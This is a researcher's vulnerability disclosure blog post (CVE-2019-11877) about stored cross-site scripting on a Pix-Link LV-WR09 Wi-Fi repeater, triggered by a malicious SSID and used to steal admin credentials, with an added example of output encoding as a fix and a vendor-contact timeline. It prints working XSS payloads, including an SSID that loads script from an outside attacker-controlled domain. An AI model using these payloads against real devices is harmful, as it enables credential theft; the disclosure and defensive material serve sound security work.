[CVE-2019-11877] Credentials Stealing Through XSS on Pix-Link Repeater

Igor Gomes
May 27

I needed a Wi-Fi repeater for my house and bought a Pix-Link LV-WR09 because it was one of the cheapest. I thought “What could go wrong with that?”

When I opened the repeater's configuration page, I saw that the network listing function could be vulnerable to a Cross-Site Scripting attack through a Wi-Fi network with a malicious SSID.

I used my smartphone to create a wifi network named

<script>alert('XSS')</script>

And did the test:

Yes! It’s vulnerable!!

Now it’s time to make a real attack.


An SSID is limited to a maximum of 32 characters, so I registered a small enough domain:

http://ilrg.xyz/

I changed the SSID on my smartphone to <script src=//ilrg.xyz></script> and in the index.html I put my script:

Now I just need to go to the settings page of the repeater and scan for available networks.

It will run the XSS and send the data to a file on my server.

It worked!

With this, we have a PoC!
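
The root cause is that the scan page writes the SSID, which anyone in radio range controls, into HTML without output encoding. The following is an added example, not code from the original post or from the vendor's firmware (which the post does not show): it contrasts an unencoded scan-table row with an encoded one. The function names, the row layout and the sample scan results are assumptions constructed for illustration.

```javascript
// Added example: the firmware's real page code is not shown in the post.
// Row layout, function names and scan data are assumptions for illustration.

// Encode the characters that let a string break out of HTML text
// or out of a quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: the scanned SSID is concatenated into markup as-is,
// so the browser parses it as HTML in the admin page's origin.
function renderRowUnsafe(net) {
  return '<tr><td>' + net.ssid + '</td><td>' + net.channel + '</td></tr>';
}

// Hardened pattern: every scan field is treated as untrusted and encoded.
function renderRowSafe(net) {
  return '<tr><td>' + escapeHtml(net.ssid) + '</td><td>' +
    escapeHtml(net.channel) + '</td></tr>';
}

function renderTable(rows, renderRow) {
  return '<table>' + rows.map(renderRow).join('') + '</table>';
}

// Constructed scan results; the second SSID is the test string from the post.
const scanResults = [
  { ssid: 'HomeNetwork', channel: 6 },
  { ssid: "<script>alert('XSS')</script>", channel: 11 },
];

console.log('unsafe:', renderTable(scanResults, renderRowUnsafe));
console.log('safe:  ', renderTable(scanResults, renderRowSafe));
```

In browser-side code, assigning the SSID through `textContent` instead of building markup strings has the same effect as the encoding shown here.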

Sources that served as inspiration:

http://foofus.net/goons/percx/papers/Practical_Exploitation_Using_Malicious_SSIDs.pdf

https://medium.com/caio-noobs-around/roteador-tc7337-dns-poisoning-atrav%C3%A9s-de-xss-1a92ed254120

https://fireshellsecurity.team/cve-2017-14219-xss-no-roteador-intelbras-wrn-240/

Timeline:

28/04/2019 — First email sent to the vendor (no answer)

06/05/2019 — Second email sent to the vendor (no answer)

15/05/2019 — Third email sent to the vendor (no answer)

27/05/2019 — Disclosure
